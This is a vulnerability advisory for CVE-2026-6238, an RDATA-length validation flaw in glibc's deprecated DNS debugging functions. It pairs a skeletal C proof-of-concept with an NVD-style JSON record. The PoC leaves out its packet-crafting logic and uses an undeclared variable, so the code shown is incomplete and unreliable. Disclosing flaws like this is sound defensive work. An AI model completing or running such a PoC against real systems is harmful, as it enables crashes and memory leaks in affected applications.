CVE-2026-6238

/* * PoC for CVE-2026-6238 * Demonstrates triggering the vulnerability by passing a crafted buffer * to the deprecated ns_printrrf function. */ #include <resolv.h> #include <stdio.h> #include <string.h> int main() { // Craft a malicious DNS response packet unsigned char malicious_packet[256]; memset(malicious_packet, 0, sizeof(malicious_packet)); // Set a specific record type (e.g., LOC) and manipulate RDATA length // to exceed the actual buffer size provided to the parser. // ... (Packet crafting logic omitted for brevity) // Call the vulnerable deprecated function // If the library is vulnerable, this may cause a crash or leak memory ns_initparse(malicious_packet, sizeof(malicious_packet), &msg); ns_printrrf(stdout, malicious_packet, sizeof(malicious_packet), &msg); return 0; }

{"cve": {"id": "CVE-2026-6238", "sourceIdentifier": "3ff69d7a-14f2-4f67-a097-88dee7810d18", "published": "2026-04-28T19:37:47.523", "lastModified": "2026-05-04T17:57:24.007", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The deprecated functions ns_printrrf, ns_printrr and fp_nquery in the GNU C Library version 2.2 and newer fail to validate the RDATA content against the RDATA length in a DNS response when processing LOC, CERT, TKEY or TSIG records, which may allow an attacker to craft a DNS response, causing a target application to crash or read uninitialized memory.\n\nThese functions are for application debugging only and hence not in the path of code executed by the DNS resolver. Further, they have been deprecated since version 2.34 and should not be used by any new applications. Applications should consider porting away from these interfaces since they may be removed in future versions."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "3ff69d7a-14f2-4f67-a097-88dee7810d18", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-126"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.2", "matchCriteriaId": "E6240DD2-E366-424F-BFA2-266E17793764"}]}]}], "references": [{"url": "https://inbox.sourceware.org/libc-announce/[email protected]/T/#u", "source": "3ff69d7a-14f2-4f67-a097-88dee7810d18", "tags": ["Third Party Advisory"]}, {"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=34069", "source": "3ff69d7a-14f2-4f67-a097-88dee7810d18", "tags": ["Issue Tracking"]}]}}